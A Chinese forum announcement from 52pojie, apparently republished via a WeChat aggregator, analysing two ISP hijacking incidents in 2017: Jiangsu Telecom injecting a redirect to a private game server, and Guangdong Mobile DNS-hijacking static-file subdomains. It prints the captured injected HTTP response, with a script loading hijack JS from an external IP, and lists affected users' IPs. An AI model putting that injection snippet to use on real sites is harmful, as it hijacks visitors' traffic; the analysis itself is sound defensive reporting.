专栏名称: 吾爱破解论坛

吾爱破解论坛致力于软件安全与病毒分析的前沿，丰富的技术版块交相辉映，由无数热衷于软件加密解密及反病毒爱好者共同维护，留给世界一抹值得百年回眸的惊艳，沉淀百年来计算机应用之精华与优雅，任岁月流转，低调而奢华的技术交流与探索却

关于江苏电信用户访问跳转到私服页面问题和广东移动用户访问卡慢头像无法显示问题说明

吾爱破解论坛 · 公众号 · 互联网安全 · 2017-08-03 13:58

正文

关于江苏电信用户访问跳转到私服页面问题和广东移动用户访问卡慢头像无法显示问题说明 （文字较长，请根据地区直接查看你可能遇到的问题和解决方案）

一、江苏电信用户访问跳转到私服页面问题（江苏电信运营商劫持导致）

1、现象
从2017年8月2日晚间18点左右开始，论坛陆续收到用户反馈，访问论坛会跳转到http://scmy58.com/jj.html 私服页面
经过远程分析诊断，这次劫持和上次路由器劫持到私服不是一个问题，有上次的分析文章，简单从http头信息可以看到这次没有Server: wys信息。

【公告】访问吾爱破解被劫持到私服页面是“wayos维盟路由器”所为！
http://www.52pojie.cn/thread-622398-1-1.html

2、排查
开始通过十几个论坛的反馈用户看出来，统一的信息都是江苏省的电信用户，通过诊断日志看也没有特殊的问题，所以我们直接远程用户进行抓包分析
看到访问论坛首页整个包都被替换成劫持代码：

HTTP/1.1 200 OK
Content-Type: text/html;charset=utf-8
Connection: close
Expires: 0
Cache-control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Content-Length: 667

<script>(function(w){var a7= w.a7 || {} ;var d=document;a7.u = function() { var f = d.location.href; d.getElementById("m").src=f+(f.indexOf("&")<0?'?':'?')+'_t_t_t='+Math.random(); };w.a7 = a7;})(window);</script><style>body {margin:0;color:#000;overflow:hidden;padding:0;height:100%;font-family:Arial}#i{display:block; position:absolute; z-index:1; width:100%; height:100%}</style><div id="i"><iframe id="m" frameborder="0" width="100%" height="100%"> </iframe></div><script type="text/javascript" src="http://118.89.163.236/js/sf.js?u=923253" charset="utf-8"/></blockquote> 从这代码看到劫持JS来自http://118.89.163.236/js/sf.js?u=923253，从这个JS中也可以清楚看到劫持代码会跳转到http://scmy58.com/jj.html ，并且会判断要劫持的域名，其中我们网站也包含在内： <img referrerpolicy="no-referrer" data- referrerpolicy="no-referrer" src="http://mmbiz.qpic.cn/mmbiz_png/LFPriaSjBUZIbEHI4NlwHsGJbicbkBRhrEdWCmiaFqoiaHOciaARCJiclp3nsLJSu0uqfM5RYicF9IwphthHicW3dsy6SQ/0?wx_fmt=png" class="" data-ratio="0.47710241465445463" data-w="1201" data-type="png"/><img referrerpolicy="no-referrer" data- referrerpolicy="no-referrer" src="http://mmbiz.qpic.cn/mmbiz_png/LFPriaSjBUZIbEHI4NlwHsGJbicbkBRhrEiaAATVsMrEgeuwwfNPaXeI9bHRPiablpjicB3Dp4j6oxutlS4KdKCShXA/0?wx_fmt=png" class="" data-ratio="0.33657587548638135" data-w="1028" data-type="png"/>劫持JS文件可以登录论坛下载 劫持JS的路径可以简单猜出，js是江苏的缩写，sf是私服的缩写，这个劫持JS存放的服务器位于天津市腾讯云华北数据中心，我们第一时间向腾讯云安全反馈了劫持事件问题，他们跟进并确认了问题，将用来存放劫持JS的服务器做关停处理，但由于JS缓存时间很长，中招用户需要清空浏览器缓存才可以。 3、解决方案 A、清空浏览器缓存，重启浏览器访问。 通过远程用户抓包过程中清空缓存后就无法重现问题了，怀疑可能劫持者已经取消了劫持，但劫持JS的浏览器缓存时间很长，导致一直不失效，所以清空下浏览器缓存应该可以解决。 B、向本地电信运营商投诉解决。 直接打电信客户电话10000，告知访问网址www.52pojie.cn的时候，被劫持跳转到私服广告上，可以把这个分析的帖子发他们，让他们赶紧解决，不解决就到工信部投诉他们！ C、在微博投诉 直接在微博@中国电信 @中国电信客服 @江苏电信 @中国电信江苏客服还有@自己地区的官方微博进行反馈，http://weibo.com/1780478695/BuAskzZmr 这是之前一个反馈，大家可以参考格式（反馈内容写B方案里的信息），发微博反馈的时候可以@吾爱破解论坛，官微收到消息会一并转发投诉！ D、工信部投诉 工信部对于这种运营商劫持一般都会处理，只要内容真实可信，下面是提供的投诉方式，大家填写的时候一定要写清楚真实内容，才会容易得到解决。 工信部投诉地址： <blockquote style="padding-right: 65px; padding-bottom: 5px; padding-left: 0px; word-wrap: break-word; background: url(" http:="" no-repeat="" line-height:="" class="__bg_gif">http://www.chinatcc.gov.cn:8080/cms/shensu/ 【请用IE浏览器打开】</blockquote> 工信部投诉电话【如果上面地址打不开可能连工信部的网址都给你劫持了，可以试试工作日内打投诉电话】： <blockquote style="padding-right: 65px; padding-bottom: 5px; padding-left: 0px; word-wrap: break-word; background: url(" http:="" no-repeat="" line-height:="" class="__bg_gif">010-12300</blockquote> E、全站SSL本周上线。 对于这种劫持问题SSL可以解决，本周开始做线上测试，等上线后给大家发公告说明，对于下面这种劫持，SSL也无法解决。 --------------------------------------------------------------------------------------- 二、广东移动用户访问卡慢头像无法显示问题说明（广东省移动运营商劫持导致） 1、现象 这个劫持已经有一段时间了，出现的用户基本全是广东省的移动用户，在访问论坛的时候只能显示页面头部，下半部分内容要很长时间才能出现，并且用户头像都无法显示，还有爱盘也无法访问。 2、排查 通过用户上传的诊断日志，我们可以清楚的发现avatar.52pojie.cn域名被移动DNS劫持到120.198.231.x 这个广东本地的移动IP段上，down.52pojie.cn被劫持到120.198.236.x这个段上，并没有解析到360网站卫士的移动节点IP 112.25.60.130上，拿一个用户的例子详情如下： <blockquote style="padding-right: 65px; padding-bottom: 5px; padding-left: 0px; word-wrap: break-word; background: url(" http:="" no-repeat="" line-height:="" class="__bg_gif">时间：2017年8月2日 08:05:31 用户IP：120.230.171.238 递归DNS：211.136.209.212 劫持avatar.52pojie.cn IP：120.198.231.19 劫持down.52pojie.cn IP：120.198.236.35 2个域名正确解析IP：112.25.60.130</blockquote> 简单统计了下之前一些用户的反馈，我们看到递归的DNS和IP都是广东移动本地的： <blockquote style="padding-right: 65px; padding-bottom: 5px; padding-left: 0px; word-wrap: break-word; background: url(" http:="" no-repeat="" line-height:="" class="__bg_gif">IP：120.197.57.6 用户递归DNS：211.136.209.212 解析avatar.52pojie.cn错误IP： 120.198.231.20 正确解析IP：112.25.60.130 用户ip：223.73.193.132 用户的递归DNS：211.136.209.171 解析avatar.52pojie.cn错误ip： 120.198.231.16 正确解析IP：112.25.60.130 用户的递归DNS：120.196.165.154 解析avatar.52pojie.cn错误ip： 120.198.231.19 正确解析IP：112.25.60.130 用户的递归DNS：120.196.165.242 解析avatar.52pojie.cn错误ip： 120.198.231.15 正确解析IP：112.25.60.130</blockquote> avatar.52pojie.cn域名是我们存储用户头像、CSS和UC通信的域名，down.52pojie.cn域名是爱盘提供静态文件下载的，他们的共同点都是会有大量的静态文件请求。 经过远程用户分析，这些用户即使自定义DNS如114也是无法解决劫持IP问题的，因为DNS本身的IP也已经被移动劫持了，由于我们所有二级域名都启用了SSL加密，在被劫持用户那普通的http是可以访问的，但https全是无法访问，由此猜测，广东移动运营商劫持两个域名到移动内部服务器，是想做静态文件缓存减少外部流量的，但垃圾的是只支持http，并不支持https，但我们二级域名已经全部启用https，论坛头像链接全部是https的，导致移动劫持服务器无法工作，一直等访问超时后页面才能显示，导致劫持问题暴露。 3、解决方案 A、向本地电信运营商投诉解决。 直接打电信客户电话10086，告知访问网址www.52pojie.cn的时候卡慢，原因是avatar.52pojie.cn和down.52pojie.cn域名被劫持，在https下无法访问，可以把这个分析的帖子发他们，让他们赶紧解决，不解决就到工信部投诉他们！ B、在微博投诉 直接在微博@中国移动10086 @中国移动 @广东移动10086官方微博 @广东移动还有@自己地区的官方微博进行反馈，http://weibo.com/1780478695/BuAskzZmr 这是之前一个反馈，大家可以参考格式（反馈内容写A方案里的信息），发微博反馈的时候可以@吾爱破解论坛，官微收到消息会一并转发投诉！ C、工信部投诉 工信部对于这种运营商劫持一般都会处理，只要内容真实可信，下面是提供的投诉方式，大家填写的时候一定要写清楚真实内容，才会容易得到解决。 工信部投诉地址：

关于江苏电信用户访问跳转到私服页面问题和广东移动用户访问卡慢头像无法显示问题说明

正文

请到「今天看啥」查看全文